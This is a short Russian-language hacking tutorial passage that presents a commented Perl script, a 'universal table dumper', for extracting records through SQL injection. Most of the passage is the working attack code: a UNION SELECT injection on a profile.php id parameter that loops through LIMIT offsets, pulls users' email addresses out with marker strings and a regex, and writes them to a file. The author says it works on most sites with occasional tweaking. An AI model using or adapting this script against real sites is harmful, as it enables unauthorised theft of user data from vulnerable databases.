Очень хорошо иметь у себя универсальный дампер таблицы, давай же напишем его.
Привожу небольшой код с комментариями, которые помогут тебе разобраться в
скрипте.
#!/usr/bin/perl
use LWP::Simple; #подгружаем пакет LWP::Simple для работы с http
open(FH,">dump.txt"); #открываем файл на запись
$lim=0; # предопределяем переменную $lim которая будет участвовать в запросе в
качестве limit
while(1) { #начинаем бесконечный цикл
$url="http://www.example.com/profile.php?id=-1+union+select+concat('c0de',email,'ed0c')+from+users+limit+$lim,1";
# Здесь мы указываем где именно находится SQL-инъекция, обрати внимание на
объединение поля e-mail со строками, они будут использоваться регулярных
выражениях
$content = get("$url"); # выполним функцию get(), Она вернет содержимое
загруженной страницы
if($content =~ m/c0de(.*)ed0c/) { # c помощью регулярки вытаскиваем значение
поля email
print FH $1."\n"; # и заносим его в файл
$lim++; # увеличиваем значение переменой $lim на единицу
} else { # если в исходном коде нет записей
print 'Total dumped ' . $lim; # выводим общее количество сдампленых записей
exit; # и прекращаем работу скрипта
}
}
Вот и все! Как ты видишь, скрипт довольно простой и будет работать в
большинстве случаев, хотя иногда приходится переписывать под конкретный сайт.